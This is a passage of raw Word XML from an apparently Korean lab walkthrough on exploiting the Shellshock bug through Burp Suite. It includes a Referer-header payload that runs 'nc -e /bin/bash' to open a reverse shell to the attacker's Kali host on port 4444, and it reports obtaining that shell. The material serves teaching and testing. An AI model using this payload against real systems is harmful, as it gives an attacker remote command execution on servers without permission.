        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> Forward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>를 한번 눌러준다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27444029" w14:textId="0405606E" w:rsidR="00F02B2A" w:rsidRDefault="00F02B2A" w:rsidP="00F02B2A">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">ET </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>부분</w:t>
      </w:r>
      <w:r w:rsidR="00602A10">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>에서</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00602A10">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">본래 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>shellshock.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00602A10">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>을 요청했으나</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>shellshock.sh</w:t>
      </w:r>
      <w:r w:rsidR="00602A10">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>를 요청하는 것으로</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> 바</w:t>
      </w:r>
      <w:r w:rsidR="00602A10">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>뀐 부분을</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> 확인할 수 있다.</w:t>
      </w:r>
      <w:r w:rsidR="00602A10">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00602A10">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00602A10">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00602A10">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00602A10">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>가 요청되면 b</w:t>
      </w:r>
      <w:r w:rsidR="00602A10">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ash</w:t>
      </w:r>
      <w:r w:rsidR="00602A10">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>에 의해 쉘 스크립트가 실행되고,</w:t>
      </w:r>
      <w:r w:rsidR="00602A10">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00602A10">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">쉘 쇼크 취약점이 존재한다면 </w:t>
      </w:r>
      <w:r w:rsidR="00602A10">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00602A10">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00602A10">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">를 요청하는 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00602A10">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>요청헤더에</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00602A10">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> 공격 코드를 삽입하여 전송하면 원하는 명령을 실행할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D5C3EB" w14:textId="7D5656AB" w:rsidR="00F02B2A" w:rsidRDefault="00F02B2A" w:rsidP="00F02B2A">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding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5F4506C" wp14:editId="14E61784">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>36830</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1642292</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2166010" cy="189857"/>
                <wp:effectExtent l="19050" t="19050" r="24765" b="20320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010" cy="1898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84718" id="직사각형 31" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:2.9pt;margin-top:129.3pt;width:170.55pt;height:14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" filled="f" strokecolor="red" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0698E636" wp14:editId="5A20E005">
            <wp:extent cx="5556876" cy="3123210"/>
            <wp:effectExtent l="0" t="0" r="6350" b="127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338" cy="313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CD59D" w14:textId="2D9DF731" w:rsidR="00F02B2A" w:rsidRDefault="00F02B2A" w:rsidP="00F02B2A">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">6) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>부분을 다음과 같이 수정한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B5F319" w14:textId="0506D50C" w:rsidR="00F02B2A" w:rsidRPr="00F02B2A" w:rsidRDefault="00F02B2A" w:rsidP="00F02B2A">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>eferer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">: () </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>{ :;}</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>; echo “Shellshock Vulnerability TEST” $(/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> -c “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e /bin/bash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>[칼리</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>] 4444”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BB994D" w14:textId="36EE2C5F" w:rsidR="00F02B2A" w:rsidRPr="00F02B2A" w:rsidRDefault="00F02B2A" w:rsidP="00F02B2A">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding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481F381" wp14:editId="3A3EFB14">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>107315</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2328685</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4968586" cy="218457"/>
                <wp:effectExtent l="19050" t="19050" r="22860" b="10160"/>
                <wp:wrapNone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586" cy="2184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ED07A" id="직사각형 33" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:8.45pt;margin-top:183.35pt;width:391.25pt;height:17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" filled="f" strokecolor="red" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70136FF8" wp14:editId="1D331140">
            <wp:extent cx="5615963" cy="3040083"/>
            <wp:effectExtent l="0" t="0" r="3810" b="825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81" cy="305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113F8" w14:textId="0093DEC4" w:rsidR="00F02B2A" w:rsidRDefault="00F331B0" w:rsidP="00F02B2A">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>7) Forward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">를 해준 뒤 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Intercept</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">를 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>off</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>해준다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD07337" w14:textId="0FE7AEAD" w:rsidR="00F02B2A" w:rsidRDefault="00F331B0" w:rsidP="00F02B2A">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:noProof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82D8ED7" wp14:editId="4B2975B4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2174422</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>966544</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1085356" cy="254083"/>
                <wp:effectExtent l="19050" t="19050" r="19685" b="12700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356" cy="2540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1FD13" id="직사각형 39" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:171.2pt;margin-top:76.1pt;width:85.45pt;height:2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" filled="f" strokecolor="red" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6981755A" wp14:editId="10954FBD">
            <wp:extent cx="5603328" cy="1531917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387" cy="154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AB549" w14:textId="49614813" w:rsidR="00F331B0" w:rsidRDefault="00F331B0" w:rsidP="00F02B2A">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4377E745" w14:textId="60C17A34" w:rsidR="00F02B2A" w:rsidRPr="00F02B2A" w:rsidRDefault="00F02B2A" w:rsidP="00F02B2A">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00F331B0">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>다음과 같이 리버스 쉘을 획득할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309C1427" w14:textId="6CDC79FF" w:rsidR="00F02B2A" w:rsidRDefault="00F02B2A" w:rsidP="00F02B2A">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BBEDB1D" wp14:editId="4B20B4DD">
            <wp:extent cx="5712031" cy="3253740"/>
            <wp:effectExtent l="0" t="0" r="3175" b="38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70" cy="325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78A26" w14:textId="460524E0" w:rsidR="006F2E6D" w:rsidRDefault="006F2E6D" w:rsidP="00F02B2A">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D147EB2" w14:textId="3C3939EF" w:rsidR="00664756" w:rsidRDefault="00664756" w:rsidP="00F02B2A">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">다음은 </w:t>
      </w:r>
      <w:r w:rsidR="006C5A52">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
